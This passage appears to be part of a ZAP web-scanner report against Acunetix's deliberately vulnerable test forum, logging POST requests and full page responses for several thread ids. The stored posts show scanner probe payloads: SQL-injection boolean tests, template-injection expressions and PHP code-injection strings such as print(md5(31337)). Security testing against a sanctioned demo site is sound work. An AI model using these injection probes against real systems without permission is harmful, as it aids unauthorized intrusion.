parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=25 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:51 GMT Content-Length: 3124 |
Response Body - size: 3,124 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum acx[[${98991*97996}]]xca </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/acx[[${98991*97996}]]xca </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>acx[[${98991*97996}]]xca - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=26 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:51 GMT Content-Length: 3121 |
Response Body - size: 3,121 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3*2<(0+5+497-497) </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3*2<(0+5+497-497) </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3*2<(0+5+497-497) - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=27 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:51 GMT Content-Length: 3080 |
Response Body - size: 3,080 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>${@print(md5(31337))}\</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=28 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:51 GMT Content-Length: 3127 |
Response Body - size: 3,127 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum acx__${98991*97996}__::.x </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/acx__${98991*97996}__::.x </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>acx__${98991*97996}__::.x - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=29 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:51 GMT Content-Length: 3121 |
Response Body - size: 3,121 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3*2>(0+5+497-497) </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3*2>(0+5+497-497) </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3*2>(0+5+497-497) - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=3 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 415 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:47 GMT Content-Length: 3137 |
Response Body - size: 3,137 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3+627-627-1=0+0+0+1 -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3+627-627-1=0+0+0+1 -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3+627-627-1=0+0+0+1 -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=30 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:52 GMT Content-Length: 3079 |
Response Body - size: 3,079 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>'.print(md5(31337)).'</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=31 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:51 GMT Content-Length: 3142 |
Response Body - size: 3,142 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 2+737-737-1=0+0+0+1 -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 2+737-737-1=0+0+0+1 -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 2+737-737-1=0+0+0+1 -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=32 |
Method | POST |
Parameter | |
Attack | |
